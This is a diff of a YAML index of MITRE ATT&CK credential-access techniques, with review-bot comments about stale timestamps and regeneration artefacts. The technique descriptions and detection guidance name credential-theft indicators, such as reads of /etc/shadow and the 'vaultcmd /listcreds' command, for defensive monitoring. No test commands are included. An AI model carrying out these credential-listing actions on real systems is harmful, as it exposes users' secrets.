Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -48158,6 +48903,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -48169,18 +48915,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -48199,14 +48945,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -48235,24 +48978,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -48287,13 +49032,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -48371,14 +49113,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -48394,6 +49135,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -48402,13 +49144,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -48416,15 +49158,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
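Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM, root, User) is removed from T1056 with no replacement field, and the same removal is made for T1003.008, T1556.001, T1556.005 and T1003.006 below. That is consistent with the spec bump to 3.2.0 at the end of this object, but if anything in the repository filters or sorts atomics by required privilege against this index it silently loses its input; a one-line note in the commit message that the field is gone from the source data would save the next reader from re-deriving that.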
@@ -48435,9 +49173,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -48483,7 +49220,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
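Review bot: `modified` for T1557.002 moves backwards here, from 2022-11-08T14:00:00.188Z to 2022-07-22T18:37:22.176Z, while every other `modified` in this patch moves forward to a 2024 timestamp; the same regression appears for T1558.002 below (2021-04-29 to 2020-03-25). A backwards `modified` on an object whose `x_mitre_attack_spec_version` stays at 2.1.0 (visible in the next hunk) suggests these two objects were pulled from a different, older snapshot than the rest. Please check which bundle they came from, since any consumer that detects updates by comparing `modified` will treat these entries as unchanged or stale.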
@@ -48502,17 +49239,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -48545,10 +49281,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -48585,11 +49320,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -48657,34 +49391,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
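Review bot: the description context lines in this hunk break mid-sentence around `/etc/passwd` and `/etc/shadow` (`and /etc/shadow` and `. By default, /etc/shadow` sit on their own lines), which looks like inline markup in the upstream text being stripped and replaced with a newline by the generator; the detection text of this same object (`, alerting on the pid,`) and the `vaultcmd.exe` detection text of T1555.004 further down show the same pattern. Not introduced by this change, but since every object is being regenerated anyway this is the moment to fix the generator so the sentences stay on one line rather than re-emitting the broken form.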
@@ -48693,20 +49403,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests: []
T1558.002:
@@ -48738,7 +49470,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -48764,13 +49496,11 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
atomic_tests: []
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
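Review bot: T1558.002 is handled differently from the other techniques in this patch: `x_mitre_attack_spec_version: 2.1.0` is deleted outright instead of being bumped to 3.2.0 as for T1187, T1056, T1555.004 and T1111, and `x_mitre_permissions_required: - User` is kept although that field is removed from T1056, T1003.008, T1556.001 and T1556.005 elsewhere in the same patch. Together with the regressed `modified` date in the preceding hunk this looks like a stale source object rather than an intentional exception; either refresh it from the same bundle as the rest or record why it is excluded.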
@@ -48787,24 +49517,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -48845,36 +49575,13 @@ credential-access:
url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -48895,6 +49602,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -48909,52 +49617,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
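Review bot: this hunk interleaves two objects: the `T1556.005:` / `technique:` header, its `id`, `created` and all four of its references are shown as removed, and then the same header is re-added after the T1556.001 references, so the T1556.001 and T1556.005 changes cannot be read independently. Regenerating the diff with a histogram or patience algorithm (or emitting keys in a stable order so an object's fields do not move past its neighbour) would give one self-contained hunk per object. As it stands a reviewer has to confirm by hand that every removed T1556.005 entry (store_pwd_rev_enc, how_pwd_rev_enc_1, how_pwd_rev_enc_2, dump_pwd_dcsync, and the 2022-01-13 `created` timestamp) reappears in the next hunk; it does, with the `modified` date moving from 2022-05-11 to 2024-08-26 as for the other refreshed objects.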
@@ -48976,6 +49674,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -48986,23 +49685,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -49073,9 +49799,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -49134,12 +49859,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests: []
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -49171,6 +49895,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -49180,7 +49905,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -49192,111 +49916,49 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests: []
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
